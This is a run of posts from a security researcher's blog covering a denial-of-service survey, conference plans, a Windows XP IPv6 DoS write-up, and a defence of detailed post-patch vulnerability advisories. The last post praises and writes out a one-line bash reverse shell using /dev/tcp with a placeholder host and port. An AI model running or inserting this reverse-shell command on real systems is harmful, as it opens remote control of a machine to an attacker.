Hey All,
I wanted to do a brief repost over here to direct everyone to the 5-part non-technical blog series that I did on cons (for the most part) and con experiences. This was my contribution to blogging following Blackhat / DEFCON.
Enjoy!
Hey All,
Thanks to everyone who's filled it out, for those of you that haven't... you still can (survey). A large number of people are prefering to stay anonymous, but I have gotten some rather interesting comments. To date 169 people have filled out the survey. If all goes well, I'm hoping to start analyising the results after about a week or so.
To clarify, for anyone who reads this first... When I say Denial of Service, I'm not considering packet flooding (these days you essentially need DDoS for that)... I'm thinking single packets that cause servers to crash, or malformed pages that cause browsers to crash. That being said, I don't want to influence anyones answers... that's why I provided plenty of places for notes. Feel free to tell me what you really think.
Lastly, in the goal of making an interesting whitepaper out of this, I've started contacting vendors. Currently I've contacted Adobe, Apple, Google, Microsoft, Red Hat and Sun. I've asked them to answer the survey (and provide me with unique information via email that they will put in the name, email and url portions (for proper identification)) and I've passed on a few vendor specific questions. I've taken the route of contacting their PR agencies, so we'll see what happens.
Hey All,
Quick post here as I'm trying to gather some statistics related to Denial of Service and people's perception related to it. I've posted a small survey @ http://tinyurl.com/dossurvey, if anyone is interested in filling it out.
Thanks,
Tyler
Hey Everyone,
So Blackhat/Defcon is behind us... Instead of blogging about the talks, I've taken a different approach and I've been doing some non-technical blogging. In the end it will be a 5-part series, but the first three are already up.
They are:
The last two will most likely appear early next week.
Also, now that Blackhat/ DEFCON are over... What's next? As far as I know the next Con I'll be attending is SecTor. Last year was the first SecTor and I had the opportunity to attend. SecTor will actually make it's way into my upcoming blog series (from above) on the VERT Blog. That being said, I wanted to remind people that it's coming up, after all... it's held in Toronto and I live in Toronto, so the more people that attend, the more people I get to meet.
For anyone who didn't get a chance to visit SecTor last year and is curious about the quality / style of the talks, I tried to write-up everything that I saw.
Of course, these are biased because they're all my opinion, but I do recommend the Con for anyone that can make it up this way. Let me know if you'll be coming up and we'll make arrangements to get together for a beer.
I'm not back yet, but I wanted to link to a blog post I threw up over on the nCircle VERT blog before I left for my holidays.
XP IPv6 DoS & IPv6 Networking Issues with W2K3 and Ubuntu (Also a DoS)
This doesn't have a CVE (yet?), but it does have a BID.
Next week, I'll be back to posting regularly.
I read this today on a local news site and the only thought that went through my head was "wow"... Essentially a malicious individual hacked the Epilepsy Foundation's website and posted hundreds of rapidly flashing images. While I don't condone it... I can understand why people think they should target websites for profit or pride... but this? It's just plain mean... It makes me wonder what the world is coming to.
Update: Apparently this is old news and I'm a little slow finding out about it.
There were a couple of random things that I wanted to comment on.
The first was a post by Dave Lewis of Liquidmatrix. The post in question is a discussion of a Wonderware advisory released by Core Security and the level of detail that they provided. Dave doesn't agree with the level of detail provided... as they had details on how to exploit the vulnerability and even showed the assembly from the vulnerable function. He also comments that this isn't responsible disclosure. I'm <sarcasm>really glad to see this debate is coming up again</sarcasm>... but really where's the lack of responsible disclosure? Core reported the vulnerability to the vendor (repeatedly) and went out of their way to ensure the vendor was aware, this is more than a lot of people / companies do. They then continually pushed their advisory release date to accommodate the company. These details are being released after the patch as well.
There's absolutely nothing wrong with this... it's really no different from the level of detail provided by other security vendors that release advisories. Once the patch is out there isn't much to stop malicious individuals from obtaining the assembly to the vulnerable function... a copy of IDA Pro and BinDiff is really all they need. Outside of the assembly... the level of detail provided is really the same as most other security vendors that release advisories. I've seen them include some sort of binary analysis in the past... and most of them contain a text write-up... here's an example with enough text to more than locate the vulnerability from TippingPoint / ZDI:
The specific flaw exists in the oninit.exe process that listens by default on TCP port 1526. During authentication, the process does not validate the length of the supplied user password. An attacker can provide a overly long password and overflow a stack based buffer resulting in arbitrary code execution.
Part of the problem with the InfoSec battle is that the bad guys have essentially unlimited time, where as IS employees have families and lives and work a set schedule. The Core advisory has set internal security teams on their way to developing their own exploits should they need to, without it they'd have had a lot more work to do and it would have taken them more time. Core did everything short of release the related Python and you can't really blame them, since then they'd be giving away their product for free. In the end, what they did was, in my opinion, beneficial to all.
It's one thing to simply release details, but as soon as someone works with the vendor you can't really cry foul when they publish the details. At least not on the 'responsible disclosure' front... because they've followed responsible disclosure and in this case Core Security hasn't done anything different then a number of vendors. Microsoft Tuesday is coming up and watch the mailing lists, each vendor that has reported a vuln usually sends out some sort of advisory and these range from brief overviews to full binary analysis and specific details on exploiting the vulnerability. We've seen it before and we'll see it again... but the patch is out, so they aren't helping the malicious individuals... just the good guys who have time constraints.
I don't have much to add, simply details from the original post. Spyware Sucks has a post up documenting some malicious flash that is being served from LiveJournal.com (from one of their banner ads). Just thought I should share to keep people informed.
I've been kinda quiet here the last few days... That being said I've been posting quite a bit on the nCircle VERT blog. I decided that I wouldn't cross post between blogs and I won't post links to CDO on the nCircle blog for no reason, however I will post links to the nCircle blog on here...
In the past few days I've posted these stories on the nCircle blog... feel free to give them a read:
I've got a couple interesting blog posts in the works, that will most likely show up here in the near future... but for now there's something to read.
This is really cool... Neohapsis has a great blog post on how a one line bash shell command can create a reverse shell (via Infosec Ramblings).
Think about all those times when you needed a single command line to create a reverse shell... this will do it:
exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
That's it.. plain and simple and you're done... no need for any outside tools...just the ability to run built in shell commands.